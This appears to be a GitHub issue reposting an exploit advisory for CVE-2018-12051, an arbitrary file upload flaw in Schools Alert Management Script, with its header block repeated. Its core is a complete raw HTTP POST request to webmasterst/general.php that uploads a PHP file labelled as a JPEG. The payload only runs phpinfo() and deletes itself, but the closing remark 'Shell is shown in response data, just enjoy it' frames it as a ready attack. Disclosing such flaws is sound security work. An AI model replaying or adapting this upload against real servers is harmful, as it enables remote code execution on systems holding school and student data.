Open unh3x opened 6 years ago
Date: 07.06.2018 Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/ Category: Web Application Exploit Author: M3@pandas From DBAppSecurity Tested on: Linux Mint CVE: CVE-2018-12051
webmasterst/general.php
POST /schoolalert/webmasterst/general.php HTTP/1.1 Host: www.schoolcollageerp.com Connection: close Content-Type: multipart/form-data; boundary=---------------------------212590549826078610017859173 Content-Length: 369 -----------------------------212590549826078610017859173 Content-Disposition: form-data; name="sch_logo"; filename="x1.php" Content-Type: image/jpeg <?php phpinfo();@unlink(__FILE__);?> -----------------------------212590549826078610017859173 Content-Disposition: form-data; name="submit.x" 1 -----------------------------212590549826078610017859173--
.
Shell is shown in response data, just enjoy it.
================= Schools Alert Management Script - Arbitrary File Upload
Date: 07.06.2018 Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/ Category: Web Application Exploit Author: M3@pandas From DBAppSecurity Tested on: Linux Mint CVE: CVE-2018-12051
================= Vulnerable cgi:
webmasterst/general.php
================= Proof of Concept:
Shell is shown in response data, just enjoy it.
.